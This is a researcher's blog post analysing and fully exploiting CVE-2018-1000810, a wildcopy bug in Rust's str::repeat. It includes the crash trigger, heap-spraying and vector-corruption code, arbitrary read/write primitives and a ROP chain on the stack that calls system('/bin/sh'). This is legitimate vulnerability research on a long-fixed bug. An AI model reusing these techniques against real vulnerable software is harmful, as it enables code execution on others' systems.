I’m a strong believer that in today’s world there’s nothing you can do to stop exploitation if an attacker has a relative/arbitrary read/write primitives, and I believe that given a memory corruption, it’s (almost) always possible to construct these primitives. From time to time I like to look at vulnerabilities that seem difficult to exploit at first glance and try to exploit them in the most reliable way (100%).
In this blog post we’re going to go through a quick analysis and a full exploit of CVE-2018-1000810, a vulnerability in the standard library of Rust found by Scott McMurray. We’ll understand the root cause of the vulnerability, how to trigger it, and construct a set of strong primitives using it.
A quick note, Rust is an amazing language, and I really recommend it for developing applications that needs to be secure. This vulnerability is already fixed in recent versions. Never take a single vulnerability as an indication of overall security. I’m writing about this vulnerability because I like the language and the bug and I’m curious to learn more.
The vulnerability is a 64bit wildcopy. I had a chance to exploit a different wildcopy in WSL, so if you’re interested in more wildcopies or just want a quick introduction to the concept before reading this blog post, you can watch my talk “Linux Vulnerabilities, Windows Exploits”. It’s another good example of how to reliably exploit a wildcopy in kernelspace. For this Rust vulnerability, we’re going to talk about userspace, and we’re going to get to a very simple && stable wildcopy exploit. We’ll write a simple Rust program that exploits the vulnerability and executes native code “without cheating”, meaning:
No “unsafe” blocks, that allows running native code by design
The only crates we use are thread, time and sync::mpsc::channel (i.e. only 2 lines with “use” are use std::{thread, time}; use std::sync::mpsc::channel;)
I developed the exploit on Ubuntu 19.10. This should work on other versions of Ubuntu. I also tested it on WSL v1/v2 and Debian 10. Works 100% :)
I tweeted a short POC for this vulnerability a couple of weeks ago, but I didn’t share the analysis of the crash itself and how we got there. Let’s get our hands dirty.
In Sep 21, 2018, the advisory for the vulnerability was published. It was fixed in this pull request, and the discussion about it explains that bug was introduced in version 1.26.0 and fixed after version 1.29.0. All stable releases between these versions are affected, so I’m going to use Rust 1.29.0 for this blog post.
We’ll start with the following code:
fn main() { let _s = "AAAA".repeat(0x4000000000000001); }
If we compile it with Rust compiler 1.29.0, we can clearly see the multiplication in the function repeat:
We can control the 2 operands of the imul instruction! Now if we run this program:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cat src/main.rs
fn main() {
let _s = "AAAA".repeat(0xc000000000000001);
}
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ rustc --version
rustc 1.29.0 (aa3ca1994 2018-09-11)
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
Finished dev [unoptimized + debuginfo] target(s) in 2.92s
Running `target/debug/exploit`
Segmentation fault (core dumped)
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
We hit a segfault! This is strange in Rust, because this is not a Rust panic, which occurs when a security check in runtime detects a problem and causes the program to abort. Here is the reason why it crashes:
(gdb) start
Temporary breakpoint 1 at 0x6072: file src/main.rs, line 2.
Starting program: /mnt/c/projects/rust/exploit/target/debug/exploit
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, exploit::main () at src/main.rs:2
2 let _s = "AAAA".repeat(0xc000000000000001);
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:249
249 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
(gdb) x/8i $rip
=> 0x7ffffe92eb1f <__memmove_avx_unaligned_erms+79>: rep movsb %ds:(%rsi),%es:(%rdi)
0x7ffffe92eb21 <__memmove_avx_unaligned_erms+81>: retq
0x7ffffe92eb22 <__memmove_avx_unaligned_erms+82>: cmp $0x10,%dl
0x7ffffe92eb25 <__memmove_avx_unaligned_erms+85>: jae 0x7ffffe92eb3e <__memmove_avx_unaligned_erms+110>
0x7ffffe92eb27 <__memmove_avx_unaligned_erms+87>: cmp $0x8,%dl
0x7ffffe92eb2a <__memmove_avx_unaligned_erms+90>: jae 0x7ffffe92eb53 <__memmove_avx_unaligned_erms+131>
0x7ffffe92eb2c <__memmove_avx_unaligned_erms+92>: cmp $0x4,%dl
0x7ffffe92eb2f <__memmove_avx_unaligned_erms+95>: jae 0x7ffffe92eb64 <__memmove_avx_unaligned_erms+148>
(gdb) x/8gx $rsi
0x7ffffe400000: 0x4141414141414141 0x4141414141414141
0x7ffffe400010: 0x4141414141414141 0x4141414141414141
0x7ffffe400020: 0x4141414141414141 0x4141414141414141
0x7ffffe400030: 0x4141414141414141 0x4141414141414141
(gdb) x/8gx $rdi
0x7ffffe600000: Cannot access memory at address 0x7ffffe600000
(gdb)
The first segfault of the minimal POC here is because of a similar issue I showed when I developed the WSL exploit (only this time in userspace, not in kernelspace). We are dealing with a wildcopy, so with extremely high probability the program will crash when the loop reaches an unmapped page, trying to copy data in there. That’s the classic segfault I expect after triggering a wildcopy vulnerability.
Great, we can trigger the wildcopy. Fun only begins, it’s not 32bit, it’s 64bit. When we exploit such a memory corruption vulnerability, we need to ask ourselves a few important questions:
Can we control (even partially) the content of the data we are corrupting with?
Can we control the length of the data we are corrupting with?
And this time, it’s also important to ask another question:
This last question is important because in jemalloc/LFH (or every bucket-based allocator), if we can’t control over the size of the chunk we are corrupting from, it might be difficult to shape the heap such that we could corrupt a specific target structure, if that structure is in a significantly different size.
At first glance, it seems clear that the answer to the first question, about our ability to control the content, is “yes”. We are taking a string and repeating it, so I (wrongly) assumed that I would be able to use any byte value I want, except maybe for “\x00” (classic C string exploitation problems). After starting to implement the exploit, I got a compilation error because of the following check:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
error: this form of character escape may only be used with characters in the range [\x00-\x7f]
--> src/main.rs:2:21
|
2 | let _s = "\x7f\xff\xff\xff".repeat(0xc000000000000001);
| ^^
error: aborting due to previous error
error: Could not compile `exploit`.
To learn more, run the command again with --verbose.
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
Rust won’t let us have non UTF-8 characters in a String instance. At all. So, we have to corrupt with bytes in the range of [0x00, 0x7f] (disclaimer – Unicode characters let us actually got the upper half range as well. See note at the end). That’s a bit annoying, but it’s absolutely possible. It would be much more pain to exploit this in kernelspace (would be hard to fake pointers using only this range), but we are at userspace, so many pointers can be represented using this range, no problem.
Now, moving on to the second question – controlling the length of the data we corrupt with. The answer here is (clearly) a big NO. Well, not directly. To trigger the vulnerability we have to specify a size larger than 2**64 bytes, but in practice we might be able to stop the wildcopy somehow. We have a number of options here:
Relying on a race condition – while the wildcopy corrupts some useful target structures or memory, we can race a different thread to use that now corrupted data to do something before the wildcopy crashes (e.g., construct other primitives, terminate the wildcopy, etc.).
If the wildcopy loop has a call to a virtual function on every iteration, and that pointer to a function is in a structure in heap memory (or at other memory address we can corrupt during the wildcopy), the exploit can use the loop to overwrite and divert execution during the wildcopy. A good example of this approach is how some of the Stagefright exploits work in Android.
If the wildcopy loop has some logic that can stop the loop under certain conditions, we can mess with these checks and stop after it corrupted enough data. This is exactly that approach I took for exploiting the WSL vulnerability I mentioned before.
Sadly, the last 2 options aren’t applicable here. Check out the loop logic where the copy occurs in our case:
No checks, no branches, no way out. So… context switches for the win! We will go with option #1.
The answer to the 3rd question, about the size of the chunk we corrupt from, is trivial. We can control it. The calculation for the size of the overwrite is:
length_of_string * repeat_arg
If, for instance, we want the size of the chunk to be 0x100, we can use the following:
"AAAA".repeat(0x4000000000000000+0x100/4);
This call will cause the Rust runtime to allocate 0x100 bytes and then write 2**64+0x100 bytes into it.
This one is easy in our case. We can spray with vectors/strings/etc, which we can control their allocation sizes (for example using Vec::with_capacity()). One useful fact about jemalloc here, is that for huge allocations, the allocator allocates chunks from top to bottom:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Finished dev [unoptimized + debuginfo] target(s) in 0.01s
Running `target/debug/exploit`
thread 0x1: allocate chunk @ 0x7f7a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2939200000, size 0x100000000
Let’s start with a simple but a very important step. Getting the segfault in memcpy when it hits an unmmaped page is pretty much useless in our case. We want to get to a memory read or write, to a jump, or anything else that we can work with. I’m going here for arbitrary read/write primitive, and for that, we’ll target the structure std::Vec. In many languages vectors are a useful tool for exploits, because once corrupted they are basically a memory read/write interface. They usually have a length field and a raw pointer, and their standard interface reads or writes arbitrary values to an address pointed by that pointer. Here’s how an item in a Rust vector is being written to, based on the implementation in Rust source:
pub fn insert(&mut self, index: usize, element: T) {
let len = self.len();
assert!(index <= len);
// space for the new element
if len == self.buf.capacity() {
self.reserve(1);
}
unsafe {
// infallible
// The spot to put the new value
{
let p = self.as_mut_ptr().add(index);
// Shift everything over to make space. (Duplicating the
// `index`th element into two consecutive places.)
ptr::copy(p, p.offset(1), len - index);
// Write it in, overwriting the first copy of the `index`th
// element.
ptr::write(p, element);
}
self.set_len(len + 1);
}
}
The use of ptr::write
and ptr::read
is also in other interfaces of working with the collection, such as push() and pop() and any other API that writes to the vector. The API allows us to control the value we’re writing with, so if we have a way to control the pointer, we have an arbitrary write. In a similar way we can get to an arbitrary read.
So, let’s try to do the following:
Spray an interesting structure (std::Vec) and shape the heap such that the vulnerable allocation will be allocated in memory before the target structures
Trigger the vulnerability in another thread
Find a corrupted vector, and use that vector in an interesting way (just read or write to it)
The only problem with this approach is that the wildcopy thread almost always wins. I tried to create lots of threads, each one sprays lots of vectors and uses them. After some trivial shaping I got an arbitrary write (crash in core::ptr::write with the repeated value from the wildcopy), but it was too unstable for my taste (works only ~50% of the times). We need to step up our game. Bear with me, at the end the exploit will be 100% stable.
One way to handle that is to try and create a very large mapped area after the chunk we are corrupting from, and hopefully execute code before the copy loop gets past it. So, let’s do the following:
Exploit thread: spray 10000
vectors, each of size 0x600000
(arbitrarily chosen, just needs to be large enough).
Vulnerability thread: trigger the vulnerability, wildcopy from a vector of size 0x600000
Exploit thread: repeatedly scan the vectors, looking for one with a corrupted length and pointer
Since jemalloc allocate large sizes from top to bottom, we end up corrupting all (or at least most, depending if we have large holes in the heap) our vectors. After the spray is done, we can walk through the vectors and see if one got its size changed:
let mut corrupted_vec = 0;
println!("[*scan*]\tstart checking vectors");
for i in 0..count {
if allocs[i][0].len() > 1 {
println!("[*scan*]\tvec corrupted! allocs[{}][0].len() == {:#x}", i, allocs[i][0].len());
corrupted_vec = i;
break;
}
}
And, if we will simply trigger the wildcopy on the string “AAAA”, and we’ll try to write to the corrupted vector any value we like (say, 0x9090909090909090), we’ll get, sure enough:
Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f4a7cdf0700 (LWP 8807)]
0x00007f4a7e408d19 in exploit::do_arbitrary_write (allocs=0x7f4a7cdef680, count=10000, target_vec=1725, second_target_vec=6299648, addr=139640115757568, value=29400045130965551)
at src/main.rs:21
21 allocs[i][0][0] = 0x9090909090909090;
(gdb) x/2i $rip
=> 0x7f4a7e408d19 <exploit::do_arbitrary_write+409>: mov %rax,(%rcx)
0x7f4a7e408d1c <exploit::do_arbitrary_write+412>: jmpq 0x7f4a7e408c50 <exploit::do_arbitrary_write+208>
(gdb) i r rcx
rcx 0x4141414141414141 4702111234474983745
(gdb) i r rax
rax 0x9090909090909090 -8029759185026510704
(gdb)
Great, we have an arbitrary write primitive out of the wildcopy! Now, let’s consider our situation and our options. We want to be able to read and write memory multiple times, to different addresses. Using the [] indexing operator we can already do that. All we need is to corrupt the raw pointer in the vector structure with some address (NULL or some arbitrary value) and set its length to 0xffffffffffffffff. Then, we can read/write relative to this fixed address, which makes it the entire address space (thus arbitrary). That’s a classic way to exploit this (also in other languages such as JS), and it works great. However, there are few things we need to worry about in this case: the address and length fields of the vector can’t have bytes out of the range [0x80-0xff], and we need to cause an integer overflow in multiplications to reach the entire space, due to the way std::Vec and Slices are implemented. It seems possible, but a more intuitive way for me is to use two vectors instead of one and avoid these problems.
We will use one vector that is going to be corrupted by the wildcopy, as an interface write over a single address. That address will hold another vector – it should be easy with heap shaping. If we assign a value at index 0 of the first vector, we will actually corrupt the raw pointer of the second vector. Once we do this, we control the absolute address to which the second vector now points to. Then we can assign a value at index 0 of the second vector, and we set that value at the address we picked before. We can repeat this process as many times as we want for as many arbitrary reads and writes we want, to any address in memory. To do that, we’ll do the following:
Spray lots of vectors
Wildcopy with a known mapped address
Now we can keep changing the second vector and use it as an interface for read/write. The only problem – we need a vector allocated at a known address, so we need to know where the heap is. In general, the heap will look like this:
Great, let’s bypass ASLR in jemalloc!
So, we have arbitrary/relative read/write primitives, but we have to rely on some mapped address before triggering the vulnerability (we have to set this address as the value in the wildcopy…). I usually don’t like to spray a lot of objects and guess an address but it might be a nice approach to start with and see where it gets us. Also, I’m running Ubuntu, which doesn’t have very good heap randomization. In other platforms, it’s very hard to simply spray a lot of object and guess one address. But in this case, jemalloc on Ubuntu, spraying tens of MBs is more than enough to get to a pre known addresses range. After experimenting with spraying lots of data multiple times, we can see there is a range of addresses we consistently reach. I chose the address 0x7f007f7f0000
, since it doesn’t require too much allocations for the allocator to get to, and it doesn’t contains any bytes above 0x7f (otherwise we will have troubles representing it as a UTF-8 string). Combining this spray with the previous POC for an arbitrary write, we can gain generic arbitrary read/write, by keep corrupting the second vector (which we leaked its address using the relative read to the known mapped address), and then use the [] operator to read/write to it. Let’s test it by calling the primitive we built:
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, 0x434343434343434343, 0x4848484848484848);
And see that it will cause:
Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fa070ff0700 (LWP 24521)]
0x00007fa07280ae32 in exploit::do_arbitrary_write (allocs=0x7fa070fef658,
corrupted_vec=9997, target_vec=23076864, target_idx=3148, addr=4846791580151137091,
value=5208492444341520456) at src/main.rs:68
68 allocs[target_idx][0][0] = value;
(gdb) x/2i $rip
=> 0x7fa07280ae32 <exploit::do_arbitrary_write+194>: mov %rcx,(%rax)
0x7fa07280ae35 <exploit::do_arbitrary_write+197>: add $0x78,%rsp
(gdb) i r rax
rax 0x4343434343434343 4846791580151137091
(gdb) i r rcx
rcx 0x4848484848484848 5208492444341520456
(gdb)
The only problem here is that when we spray huge vectors, it is likely that the address we guessed contains a part of the data buffer of one of the vectors, not the vector structure itself (which is very small). So this address is simply mapped, but doesn’t contain the structure we want to target. To get over that, we can spray even more vectors, as members of the first ones. Now, we have lots of vector structures on the heap, including at this address, with extremely high probability. So, what do we have so far?
Arbitrary read/write primitives – check
Arbitrary content in a known address – check
Heap address known – check
Now, we just need to run some payload. There are many approaches to consider here. We can try to find good targets for data only attacks (which would be very cool), but I chose the easiest and the quickest one - write a ROP chain on the stack that pops a shell. For that, we need to leak library base addresses, not just the heap’s address. Given our current primitives, it’s quite easy to get there. We have so many options:
In dlmalloc, when we free a chunk, before its header we have absolute pointers to the previous/next chunks in the bins. If it’s the first one, then we have pointers to the bins symbols in libc. Reading them gives us the virtual address of a symbol in libc, from which we can calculate its base address. This is a very useful technique in CTFs. Maybe we could find something similar, based on metadata, with jemalloc.
Find a structure with a vtable and derive the library address from a function pointer
There are many others. Since the point of this exploit is primarily to create a stable read/write primitive from the wildcopy, I feel comfortable with taking advantage of the fact we are writing our own code, and simply use the read primitive to read the actual address of a symbol that’s referenced in our Rust code:
fn get_stack_addr() -> u64 {
let local_var = String::new();
let stack_addr = &format!("{:p}", &local_var)[2..];
return u64::from_str_radix(&stack_addr, 0x10).unwrap();
}
To find the addresses of simple gadgets we can just look for the bytes sequences in the .text section around main() with the read primitive we already have. The only symbol we now need for this ROP chain is dlsym. We can easily resolve this by parsing the ELF headers, but it will make our code messy and it’s unnecessary for the POC. So, we can simply add an extern to import this symbol to our Rust code):
extern {
fn dlsym(handle: *const u8, symbol: *const u8) -> *const u8;
}
Note that this doesn’t require any unsafe blocks, it only let me cast it to u64 as follows:
let dlsym_addr = dlsym as u64;
That’s way, we can get the stack address and code addresses in our main binary.
Hang tight, we are almost done. Now we simply need to corrupt a function pointer/return address/etc, to control execution (and then gain arbitrary code execution / system() using ROP/JOP). Because this is an example exploit we will jump to system and end this, but in reality we would’ve probably needed to jump to mprotect and execute a payload. Due to RELRO over the GOT, we can’t easily corrupt the function pointers there. We can go for function pointers at known addresses, such as the equivalents of malloc_hook/etc in jemalloc, but we don’t need to go that far. Nothing checks the integrity of return addresses on the stack (Intel/AMD, in aarch64 PAC of course makes it harder). Let’s use our absolute write to corrupt a return address on the stack and continue from there with a trivial ROP chain.
Note: I didn’t want to rely on offsets in different libc versions, so I relied only on offsets in my binary. So, I took advantage over the fact the dlsym is always in the binary, and in the ROP, I simply did:
Write the string “system\x00” to a known address
Write the string “/bin/sh\x00” to a known address
dlsym(NULL, “system”)
system(“/bin/sh\x00”)
ROP chain:
println!("[*corrupt*]\tstack addr @ {:#x}, ret_addr @ {:#x}", stack_addr, ret_addr);
// set up the strings I need
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, BIN_SH_STR, 0x0068732f6e69622f);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973);
// build the ROP on the stack
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*0, main_addr + pop_rdi_ret_off + 1); // make stack aligned for movaps
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*1, main_addr + pop_rdi_ret_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*2, 0); // handle = NULL;
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*3, main_addr + pop_rsi_ret_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*4, SYSTEM);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*5, dlsym_addr);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*6, main_addr + pop_rdi_jmp_rax_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*7, BIN_SH_STR);
To sum it all up:
Spray huge allocations, up to the point the allocator uses the address we picked
Those allocations contain many vectors
Allocate same-size large string to start the wildcopy from, it falls before the vector allocations
Corrupt some vector with the same address we picked
Find this vector, and use relative read to scan forward and find another vector
Corrupt the second vector’s raw pointer, and use it for an arbitrary read/write
POC:
Before publishing this blog post I showed this exploit to my good friend Tomash. He proposed to try out higher Unicode codepoints, even though Rust complains specifically about the range [0x00, 0x7f]. Check out what happens when we use a different string that requires multibyte characters in UTF-8 and trigger the wildcopy with it. The vector.length is corrupted with this value:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
Finished dev [unoptimized + debuginfo] target(s) in 3.75s
Running `target/debug/exploit`
[*start*] Let the fun begin!
[*shape*] shape: spraying vectors
[*shape*] shape: done spraying vectors
[*vuln*] trigger_vulnerability
[*scan*] start checking vectors
[*scan*] vec corrupted! allocs[9997][0].len() == 0x90d790d790d790d7
[*scan*] done checking vectors
With this we should be able to implement an arbitrary read/write on the whole userspace range using a single vector instead of two, no problems. The exploit already works with the two vectors, so I figured I’d just drop the other approach here for completeness :)
It’s interesting to note that since this vulnerability is in a standard library, it breaks the assumption many products have while working with strings. I was thinking about converting this exploit to servo (in a RCE flow) or to redux-os (in a LPE flow). I didn’t get time to play with it, but it might be interesting to check it out.
I hope you enjoyed this exploitation and the additional information of how to deal with non trivial vulnerabilities as this one. The exploit code is in this repo, here :)